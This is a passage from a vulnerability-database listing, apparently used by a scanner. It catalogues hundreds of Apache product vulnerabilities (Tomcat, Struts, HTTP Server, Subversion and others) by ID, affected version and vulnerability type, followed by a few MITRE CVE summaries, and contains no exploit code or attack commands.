12712| [70660] Apache Subversion up to 1.6.17 spoofing
12713| [70659] Apache Subversion up to 1.6.17 spoofing
12714| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
12715| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
12716| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
12717| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
12718| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
12719| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
12720| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
12721| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
12722| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
12723| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
12724| [69846] Apache HBase up to 0.94.8 information disclosure
12725| [69783] Apache CouchDB up to 1.2.0 memory corruption
12726| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
12727| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid() privilege escalation
12728| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
12729| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
12730| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
12731| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
12732| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
12733| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
12734| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
12735| [69431] Apache Archiva up to 1.3.6 cross site scripting
12736| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
12737| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
12738| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init() privilege escalation
12739| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
12740| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
12741| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
12742| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
12743| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
12744| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
12745| [66739] Apache Camel up to 2.12.2 unknown vulnerability
12746| [66738] Apache Camel up to 2.12.2 unknown vulnerability
12747| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
12748| [66695] Apache CouchDB up to 1.2.0 cross site scripting
12749| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
12750| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
12751| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
12752| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
12753| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
12754| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
12755| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
12756| [66356] Apache Wicket up to 6.8.0 information disclosure
12757| [12209] Apache Tomcat 8.0.0-RC1/8.0.1/7.0.0/7.0.50 Content-Type Header for Multi-Part Request Infinite Loop denial of service
12758| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
12759| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12760| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
12761| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
12762| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12763| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12764| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
12765| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
12766| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
12767| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
12768| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
12769| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
12770| [65668] Apache Solr 4.0.0 Updater denial of service
12771| [65665] Apache Solr up to 4.3.0 denial of service
12772| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
12773| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
12774| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
12775| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
12776| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
12777| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
12778| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
12779| [65410] Apache Struts 2.3.15.3 cross site scripting
12780| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
12781| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
12782| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
12783| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
12784| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
12785| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
12786| [65340] Apache Shindig 2.5.0 information disclosure
12787| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
12788| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
12789| [10826] Apache Struts 2 File privilege escalation
12790| [65204] Apache Camel up to 2.10.1 unknown vulnerability
12791| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
12792| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
12793| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
12794| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file() race condition
12795| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
12796| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
12797| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
12798| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
12799| [64722] Apache XML Security for C++ Heap-based memory corruption
12800| [64719] Apache XML Security for C++ Heap-based memory corruption
12801| [64718] Apache XML Security for C++ verify denial of service
12802| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
12803| [64716] Apache XML Security for C++ spoofing
12804| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
12805| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
12806| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
12807| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
12808| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
12809| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
12810| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
12811| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
12812| [64485] Apache Struts up to 2.2.3.0 privilege escalation
12813| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
12814| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
12815| [64467] Apache Geronimo 3.0 memory corruption
12816| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
12817| [64457] Apache Struts up to 2.2.3.0 cross site scripting
12818| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
12819| [9184] Apache Qpid up to 0.20 SSL misconfiguration
12820| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
12821| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
12822| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
12823| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
12824| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
12825| [8873] Apache Struts 2.3.14 privilege escalation
12826| [8872] Apache Struts 2.3.14 privilege escalation
12827| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
12828| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
12829| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
12830| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
12831| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
12832| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12833| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12834| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
12835| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
12836| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
12837| [64006] Apache ActiveMQ up to 5.7.0 denial of service
12838| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
12839| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
12840| [8427] Apache Tomcat Session Transaction weak authentication
12841| [63960] Apache Maven 3.0.4 Default Configuration spoofing
12842| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
12843| [63750] Apache qpid up to 0.20 checkAvailable denial of service
12844| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
12845| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
12846| [63747] Apache Rave up to 0.20 User Account information disclosure
12847| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
12848| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
12849| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
12850| [7687] Apache CXF up to 2.7.2 Token weak authentication
12851| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12852| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12853| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
12854| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
12855| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
12856| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
12857| [63090] Apache Tomcat up to 4.1.24 denial of service
12858| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
12859| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
12860| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
12861| [62833] Apache CXF -/2.6.0 spoofing
12862| [62832] Apache Axis2 up to 1.6.2 spoofing
12863| [62831] Apache Axis up to 1.4 Java Message Service spoofing
12864| [62830] Apache Commons-httpclient 3.0 Payments spoofing
12865| [62826] Apache Libcloud up to 0.11.0 spoofing
12866| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
12867| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
12868| [62661] Apache Axis2 unknown vulnerability
12869| [62658] Apache Axis2 unknown vulnerability
12870| [62467] Apache Qpid up to 0.17 denial of service
12871| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
12872| [6301] Apache HTTP Server mod_pagespeed cross site scripting
12873| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
12874| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
12875| [62035] Apache Struts up to 2.3.4 denial of service
12876| [61916] Apache QPID 0.14/0.16/0.5/0.6 unknown vulnerability
12877| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
12878| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
12879| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
12880| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
12881| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
12882| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
12883| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
12884| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
12885| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
12886| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
12887| [61229] Apache Sling up to 2.1.1 denial of service
12888| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
12889| [61094] Apache Roller up to 5.0 cross site scripting
12890| [61093] Apache Roller up to 5.0 cross site request forgery
12891| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
12892| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
12893| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow() File memory corruption
12894| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
12895| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
12896| [60708] Apache Qpid 0.12 unknown vulnerability
12897| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
12898| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
12899| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
12900| [4882] Apache Wicket up to 1.5.4 directory traversal
12901| [4881] Apache Wicket up to 1.4.19 cross site scripting
12902| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
12903| [60352] Apache Struts up to 2.2.3 memory corruption
12904| [60153] Apache Portable Runtime up to 1.4.3 denial of service
12905| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
12906| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
12907| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
12908| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
12909| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
12910| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
12911| [4571] Apache Struts up to 2.3.1.2 privilege escalation
12912| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
12913| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
12914| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
12915| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
12916| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
12917| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
12918| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12919| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
12920| [59888] Apache Tomcat up to 6.0.6 denial of service
12921| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
12922| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
12923| [4512] Apache Struts up to 2.2.3 CookieInterceptor command injection
12924| [59850] Apache Geronimo up to 2.2.1 denial of service
12925| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
12926| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
12927| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
12928| [58413] Apache Tomcat up to 6.0.10 spoofing
12929| [58381] Apache Wicket up to 1.4.17 cross site scripting
12930| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
12931| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
12932| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
12933| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
12934| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12935| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
12936| [57568] Apache Archiva up to 1.3.4 cross site scripting
12937| [57567] Apache Archiva up to 1.3.4 cross site request forgery
12938| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
12939| [4355] Apache HTTP Server APR apr_fnmatch denial of service
12940| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
12941| [57425] Apache Struts up to 2.2.1.1 cross site scripting
12942| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
12943| [57025] Apache Tomcat up to 7.0.11 information disclosure
12944| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
12945| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
12946| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12947| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
12948| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
12949| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
12950| [56512] Apache Continuum up to 1.4.0 cross site scripting
12951| [4285] Apache Tomcat 5.x JVM getLocale() denial of service
12952| [4284] Apache Tomcat 5.x HTML Manager cross site scripting
12953| [4283] Apache Tomcat 5.x ServletContect privilege escalation
12954| [56441] Apache Tomcat up to 7.0.6 denial of service
12955| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
12956| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
12957| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
12958| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
12959| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
12960| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
12961| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
12962| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
12963| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
12964| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
12965| [54693] Apache Traffic Server DNS Cache unknown vulnerability
12966| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
12967| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
12968| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
12969| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
12970| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
12971| [54012] Apache Tomcat up to 6.0.10 denial of service
12972| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
12973| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
12974| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
12975| [52894] Apache Tomcat up to 6.0.7 information disclosure
12976| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
12977| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
12978| [52786] Apache Open For Business Project up to 09.04 cross site scripting
12979| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
12980| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
12981| [52584] Apache CouchDB up to 0.10.1 information disclosure
12982| [51757] Apache HTTP Server 2.0.44 cross site scripting
12983| [51756] Apache HTTP Server 2.0.44 spoofing
12984| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
12985| [51690] Apache Tomcat up to 6.0 directory traversal
12986| [51689] Apache Tomcat up to 6.0 information disclosure
12987| [51688] Apache Tomcat up to 6.0 directory traversal
12988| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
12989| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
12990| [50626] Apache Solr 1.0.0 cross site scripting
12991| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
12992| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
12993| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
12994| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
12995| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
12996| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
12997| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
12998| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
12999| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
13000| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
13001| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
13002| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13003| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13004| [47640] Apache Struts 2.0.11/2.0.6/2.0.8/2.0.9/2.1 cross site scripting
13005| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13006| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13007| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13008| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13009| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13010| [47214] Apachefriends xampp 1.6.8 spoofing
13011| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13012| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13013| [47065] Apache Tomcat 4.1.23 cross site scripting
13014| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13015| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13016| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13017| [86625] Apache Struts directory traversal
13018| [44461] Apache Tomcat up to 5.5.0 information disclosure
13019| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13020| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13021| [43663] Apache Tomcat up to 6.0.16 directory traversal
13022| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13023| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13024| [43516] Apache Tomcat up to 4.1.20 directory traversal
13025| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13026| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13027| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13028| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13029| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13030| [40924] Apache Tomcat up to 6.0.15 information disclosure
13031| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13032| [40922] Apache Tomcat up to 6.0 information disclosure
13033| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13034| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13035| [40656] Apache Tomcat 5.5.20 information disclosure
13036| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13037| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13038| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13039| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13040| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13041| [40234] Apache Tomcat up to 6.0.15 directory traversal
13042| [40221] Apache HTTP Server 2.2.6 information disclosure
13043| [40027] David Castro Apache Authcas 0.4 sql injection
13044| [3495] Apache OpenOffice up to 2.3 Database Document Processor Designfehler
13045| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13046| [3414] Apache Tomcat WebDAV Stored Umgehungs-Angriff
13047| [39489] Apache Jakarta Slide up to 2.1 directory traversal
13048| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
13049| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13050| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13051| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13052| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
13053| [38524] Apache Geronimo 2.0 unknown vulnerability
13054| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13055| [38331] Apache Tomcat 4.1.24 information disclosure
13056| [38330] Apache Tomcat 4.1.24 information disclosure
13057| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13058| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13059| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13060| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13061| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13062| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13063| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13064| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13065| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13066| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13067| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13068| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13069| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13070| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13071| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13072| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13073| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13074| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13075| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13076| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13077| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13078| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13079| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13080| [34252] Apache HTTP Server denial of service
13081| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13082| [33877] Apache Opentaps 0.9.3 cross site scripting
13083| [33876] Apache Open For Business Project unknown vulnerability
13084| [33875] Apache Open For Business Project cross site scripting
13085| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid() memory corruption
13086| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13087| [31827] XMB Extreme Message Board up to 1.9.6 Apache HTTP Server memcp.php directory traversal
13088| [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability
13089| [31663] vbPortal Apache HTTP Server index.php directory traversal
13090| [2414] Apache HTTP Server up to 2.2.3 mod_rewrite memory corruption
13091| [2393] Apache HTTP Server up to 2.2.2 HTTP Header cross site scripting
13092| [30623] Apache James 2.2.0 SMTP Server denial of service
13093| [30176] PHP-Fusion up to 6.00.306 Apache HTTP Server .php.gif privilege escalation
13094|
13095| MITRE CVE - https://cve.mitre.org:
13096| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13097| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13098| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13099| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
